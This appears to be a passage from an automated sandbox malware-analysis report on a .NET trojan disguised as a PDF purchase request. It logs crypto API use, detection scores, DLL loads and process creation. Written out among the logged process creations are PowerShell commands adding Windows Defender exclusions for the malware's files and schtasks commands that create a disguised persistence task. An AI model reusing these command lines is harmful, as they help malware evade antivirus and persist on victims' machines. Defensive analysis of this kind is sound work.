                    Source: vmPeKTe.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, 1UT6pzc0M.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, DnQOD3M.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, 01seU.csCryptographic APIs: 'CreateDecryptor'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, iUDwvr7Gz.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, XUu2qKyuF6.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, aZathEIgR.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, l50VLEll22.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e90820.2.raw.unpack, l50VLEll22.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4e11a00.1.raw.unpack, CICuwYIYM9uBpgQHNv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, TAL8UFyQqTbGLmT9Io.csSecurity API names: _0020.AddAccessRule
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.a140000.5.raw.unpack, CICuwYIYM9uBpgQHNv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: 0.2.REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe.4d92be0.3.raw.unpack, CICuwYIYM9uBpgQHNv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@21/15@2/2
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: C:\Users\user\AppData\Roaming\vmPeKTe.exeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7916:120:WilError_03
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\tmpDF64.tmpJump to behavior
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeReversingLabs: Detection: 57%
                    Source: REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeVirustotal: Detection: 65%
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeFile read: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe"
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vmPeKTe.exe"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\vmPeKTe.exe C:\Users\user\AppData\Roaming\vmPeKTe.exe
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp"
                    Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vmPeKTe.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpDF64.tmp"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vmPeKTe" /XML "C:\Users\user\AppData\Local\Temp\tmpF3B7.tmp"Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vmPeKTe.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: iconcodecservice.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\REQUEST FOR HOPPER SCALE AND CONVEYOR MACHINE.pdf.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
